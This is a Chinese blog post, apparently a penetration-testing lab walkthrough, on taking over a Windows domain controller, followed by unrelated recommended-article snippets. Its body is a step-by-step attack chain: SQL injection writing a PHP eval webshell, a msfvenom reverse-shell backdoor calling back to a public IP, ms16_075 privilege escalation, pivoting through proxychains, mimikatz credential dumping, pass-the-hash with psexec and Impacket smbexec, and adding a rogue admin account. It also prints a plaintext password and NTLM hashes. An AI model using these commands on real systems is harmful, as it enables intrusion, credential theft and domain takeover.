msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 小米流量电信卡(工信部对三大运营商收费新规)

    众所周知,近来工信部一直在鞭策三大运营商提速降费,在督促之下三家运营商的流量费用确实降了不少,但说实话依旧有些吃不消,而这种情况也催生了一系列的虚拟运营商,就比如小米。 据悉,小米在近两年前就推出了主打低价全国流量的吃到饱套餐,随着提速降费政策的进一步深入,小米移动的吃到饱套餐也更加划算。10月17日消息,小米移动官方微博近日正式宣布,将推出了吃到饱6月元套…

    2023-06-12 投稿
  • 绘图软件有哪些?三维造型画图建模软件有哪些

    机械行业常用的三维造型画图建模软件比较多?零基础学员不知道应该如何去选择,到底哪个软件适合你呢?很纠结 很纠结的。今天啊军老师来和你分享交流下。欢迎大家探讨和交流! 目前常用的三维造型画图常用的软件有: 上图这些图标大家都很熟悉吧,都见过了,也自学过哦!只是停留在皮毛没有真正掌握和熟练引用吧,要是上面这些软件你都会而且很熟练是不是老牛逼了,NO NO!其实软…

    2023-02-03
  • 雪梨老公张衍家是干嘛的(雪梨家庭背景也惊人)

    在这个“全民网红”的时代,只要你有一部手机,就可以开启自己的直播间。如果你还有不错的口才,有一些拿得出手的才艺,那赚钱更是易如反掌。 在众多网红里,雪梨一直是比较特殊的一位。   毕竟,她曾是王思聪的女友,还被王思聪带回家见了家长,甚至分手之后,她跟王思聪依旧保持着良好的关系。 这一切足以证明,雪梨是个极具智慧的女子。但是,偏偏这个智慧的女子,却走…

    2022-01-05 投稿
  • 庶女攻略人物关系介绍各个人物结局

    从《庶女攻略》全书看,十一娘幸福爆棚:丈夫独爱独宠她一人,为了她放弃了整片大森林,徐令宜应该可以说是侯爵中唯一过着一夫一妻生活的人了吧;儿女孝顺,又能过上自己的小日子不需要她操心,不管是亲生子女还是继子女、养子还是儿媳妇们都敬她亲她;婆媳、妯娌关系融洽,太夫人疼爱她、重用她,各房夫人也都与她维持着平和的关系;到最后唯有两房妾室,乔姨娘安安静静,文姨娘甚至能帮…

    2022-05-07
  • 酱驴肉怎么做好吃又简单(驴肉丸子的配料及做法)

    现在天气变得越来越冷,很多人都比较喜欢喝一些汤汤水水,尤其是北方地区的朋友,都习惯性的去喝驴肉汤,羊肉汤这样的食物,鱼肉除了做汤以外,还可以做卤驴肉,鱼肉丸子汤等等,汤一类的食物确实很棒,而且还能加上其他的食材鱼肉丸子的做法也有很多类型,只要喜欢吃的话,可以学学关于肉丸子的不同做法。 驴肉丸子汤的做法 食材食谱热量:99(大卡) 主料驴肉丸250克白菜适量 …

    2022-03-20
  • 英雄联盟魂锁典狱长,锤石文案灵魂锁链

    本文将会介绍辅助位魂锁典狱长锤石的各种基础知识,包括英雄的优势与劣势、符文的搭配方法、技能升级与加点、与几个代表AD英雄的配合方法、与常见辅助英雄的对位介绍、游戏内的英雄细节技巧、游戏策略还有锤石的出装思路。 作为辅助英雄里的“常青树”,诞生于2013年的锤石凭借其优秀的机制从黑铁局到职业比赛都保持着一定的出场率,他的灯笼从超远距离救人,或者帮助队友从超远距…

    2023-07-03 投稿
  • 提笔写《素媛》会怎样开始(素媛肚子越来越大是什么意思)

    我想了很多次,提笔写《素媛》会怎样开始,最后决定把整个事件复述一遍。 “在韩国,一名八岁女童遭到了性侵。”这就是这个事件的起因、经过和结果,整个事件的盖棺定论。十四个字,掩住了所有情感。   素媛的痛苦,家人的挣扎,罪犯的邪恶,世界温暖和冷漠的嘴脸,都被藏在这十四个字里,好像救出素媛,送到医院,时间就会停止,她不用再面对世界。 “世界上只有一种英雄…

    2022-01-05
  • 台式电脑排行榜,618京东电脑优惠多少

    一年一度的京东618正在火热进行中,为给消费者提供更加专业的爆款电脑产品选购指南。今年618期间,京东上线电脑预售竞速排行榜,排行榜中含笔记本、台式机、平板电脑、学生平板与职教工具、电脑组件等多品类,覆盖绝大部分一线品牌,也将全方位为消费者提供电脑相关产品换新选购攻略。 作为用户在学习、办公、电竞、娱乐等使用场景中不可或缺的产品,截至5月26日,笔记本电脑销…

    2023-07-08
  • 实况2013技能,实况足球2013键盘射门技巧

    罗纳尔多,普斯卡什,劳尔,齐达内,贝克汉姆,菲戈,雷东多,卡洛斯,卡西利亚斯……这一个个熟悉而陌生的名字,在江湖的岁月沉浮中,逐渐暗淡了刀光剑影。 但,实况足球2021,再次将32位前帮派成员从不同时空聚齐,组成了传奇皇马帮,重新征战球场,大杀四方。 今天,我们分别从“攻击”、“组织”、“防御”三线分别挑选出具有特色的球员,来看一下传奇皇马帮到底有多强大。攻…

    2023-06-27 投稿
  • 上班族如何利用互联网赚钱

    如何利用互联网赚钱 随着科技的进步,我们足不出户就可以在手机上做各种事情。现在更有好多网络赚钱方式。 1.微信拉人 微信拉人,就是你利用别人的手机号,添加微信好友。当然了,想让别人同意你的好友申请,就得看你是怎么解决的了。第一天同意之后,第二天到时候你的商家会给你一个群码的,然后你拉他们进群,拉进群的,晚上就会给你们结账。拉一个人8到15块钱,一天可以赚50…

    2022-01-10
  • 五行相生相克口诀和五行对应颜色

    一、五行各有其主 木为仁,主精华茂秀,定贵贱也。 火为礼,主威势勇烈,定刚柔也。 金为义,主刑诛危难,定寿夭也。 水为智,主聪明敏达,定贤愚也。 土为信,主载育万物,定贫富也。 二、五行人 金形人: 秀丽为金骨又清,鼻高丰起贯天庭。 语言响亮如钟鼓,自是朝中有大名。 木形人: 广长为木若琅玕,形似青松耐岁寒。 方便所为心性缓,自然怜物作清官。 水形人: 水势…

    2022-05-09
  • 盛大网络游戏大全(盛大网络游戏大全列表)

    哈喽朋友们,我今天又来更新了。这次是接上一篇当年玩过的经典网络游戏,你还记得吗?(2007年)上的下半部分,所以开篇咱们废话不多讲,直接进入正题。 8、《诛仙》 2007年5月,由完美世界开发的大型mmorpg网游《诛仙》正式公测。游戏一经上线就得到了无数玩家的青睐。而《诛仙》网游的火爆,很大一部分功劳,还得归属于他的同名网络小说《诛仙》。 诛仙 诛仙 没错…

    2023-05-29 投稿